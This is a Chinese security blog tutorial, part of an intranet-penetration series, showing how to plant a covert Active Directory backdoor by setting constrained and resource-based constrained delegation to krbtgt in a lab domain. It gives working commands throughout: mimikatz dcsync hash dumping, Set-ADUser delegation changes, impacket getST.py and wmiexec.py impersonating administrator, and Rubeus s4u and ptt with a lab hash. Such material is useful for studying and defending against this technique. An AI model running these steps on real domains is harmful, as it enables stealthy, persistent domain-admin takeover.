内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

admin 2023年6月16日01:48:56评论254 views字数 2856阅读9分31秒阅读模式

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!


欢迎各位添加微信号:qinchang_198231

加入安全+ 交流群 和大佬们一起交流安全技术


目录


选择控制的用户

已经存在的有SPN的域用户

自己创建的机器账号

自己创建的域用户然后赋予SPN

利用约束性委派打造隐蔽后门(权限维持)

利用基于资源的约束委派打造隐蔽后门(权限维持)

Kali上使用impacket进行攻击

Win7上使用Rubeus进行攻击


内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)
内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

关于委派以及委派的一些攻击手法,传送门:域渗透之委派攻击

如果这里我们假设服务Bkrbtgt,服务A为我们控制的一个账号。配置服务A到服务B的约束性委派或者基于资源的约束性委派,那么我们控制的账户就可以获取KDCKey Distribution Centre)服务的ST服务票据(也就是TGT认购权证)。于是我们就可以伪造任何权限用户的TGT认购权证,来打造一个变种的黄金票据了

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)
内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

选择控制的用户

这里我们配置krbtgt允许服务A基于资源的约束委派。这里的服务A我们可以有以下几类:

1. 已经存在的有SPN的域用户

2. 自己创建的机器账号,但是要注意计算机账号密码的自动更新问题

3. 自己创建的域用户然后赋予SPN

在实战中,建议用第一种已经存在SPN的域用户,因为这样可以避免新建用户,实现动静最小化。

已经存在的有SPN的域用户

使用以下命令我们可以寻找具备SPN并且密码永不过期的用户账户。但是由于我们是测试环境,所以未配置该类型的账号。真实的企业环境中这种情况非常常见,比如许多服务账户就会满足这种条件。

Get-ADUser -Filter * -Properties ServicePrincipalName,PasswordNeverExpires | ?{($_ServicePrincipalName -ne "") -and ($_.PasswordNeverExpires -eq $true)}

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

这里比如我们找到了test用户属于这种要求,然后使用mimikatz的以下命令导出test用户的hash值,用于之后的攻击。

mimikatz "lsadump::dcsync /domain:xie.com /user:test"

自己创建的机器账号

我们可以自己创建一个机器账号ServiceA

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

这种方法有唯一一个限制条件:计算机账户密码的自动更新问题。(默认情况下)每隔30天,计算机账户密码就会自动更新,对应的凭据也会发生变化,使后门失去作用。攻击者可以使用如下方法禁止该账号密码自动更新。

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

自己创建的域用户然后赋予SPN

我们还可以自己创建一个域用户,然后赋予SPN

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

利用约束性委派打造隐蔽后门(权限维持)

我们控制的用户选择的是自己创建的 test 域用户。

· 域控:win2008  192.168.10.131

· 域:xie.com

· 攻击机:Kali

首先修改 kali /etc/hosts/文件,添加如下内容

192.168.10.131 win2008192.168.10.131 xie.com


然后在域控上配置test用户到krbtgt用户的约束性委派。 

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

Kali上进行攻击

./getST.py -dc-ip 192.168.10.131 -spn krbtgt/XIE.COM -impersonate administrator xie.com/test:x123456./export KRB5CCNAME=administrator.ccache./wmiexec.py -no-pass -k administrator@win2008 -dc-ip 192.168.10.131


内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

利用基于资源的约束委派打造隐蔽后门(权限维持)

· 域控:Win2012   192.168.10.24

· 域成员主机:Win7  192.168.10.130

· 普通域用户:xiehack

首先修改 kali /etc/hosts/文件,添加如下内容

192.168.10.24 win2012

192.168.10.24 xie.com

配置基于资源的约束委派

这里我们用刚刚新建的test用户作为服务A,配置用户 test krbtgt 的基于资源的约束委派

Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount testGet-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount


内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

在Kali上使用impacket进行攻击

./getST.py -dc-ip 192.168.10.24 -spn krbtgt -impersonate administrator xie.com/test:x123456./export KRB5CCNAME=administrator.ccache./wmiexec.py -no-pass -k administrator@win2012 -dc-ip 192.168.10.24


内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

在Win7上使用Rubeus进行攻击

现在我们在Win7上用普通域用户 xiehack 使用Rubeus进行基于资源的约束性委派攻击

这下面的rc4是刚刚新建的test用户的密码哈希,我们也可以使用aes256来进行认证。服务我们设置为 krbtgt

Rubeus.exe s4u /user:test /rc4:b98e75b5ff7a3d3ff05e07f211ebe7a8 /domain:xie.com /msdsspn:krbtgt /impersonateuser:administrator

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

导入票据,访问域控

Rubeus.exe  ptt  /ticket:票据


内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)


参考文章:https://www.anquanke.com/post/id/170535


内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

内网渗透(十一) | 哈希传递攻击(Pass-the-Hash,PtH)

技术干货 | 工具:Social engineering tookit 钓鱼网站

技术干货 | 工具的使用:CobaltStrike上线Linux主机(CrossC2)

内网渗透(十) | 票据传递攻击

内网渗透(九) | Windows域的管理

内网渗透(八) | 内网转发工具的使用

内网渗透 | 域内用户枚举和密码喷洒攻击(Password Spraying)

内网渗透(七) | 内网转发及隐蔽隧道:网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)

内网渗透(六) | 工作组和域的区别

内网渗透(五) | AS-REP Roasting攻击

内网渗透 | 内网穿透工具FRP的使用
内网渗透(四) | 域渗透之Kerberoast攻击_Python
内网渗透(三) | 域渗透之SPN服务主体名称
内网渗透(二) | MSF和CobaltStrike联动
内网渗透 | 域内认证之Kerberos协议详解
内网渗透(一) | 搭建域环境


本文始发于微信公众号(安世加):内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月16日01:48:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透(十二) | 利用委派打造隐蔽后门(权限维持)https://cn-sec.com/archives/523066.html

发表评论

匿名网友 填写信息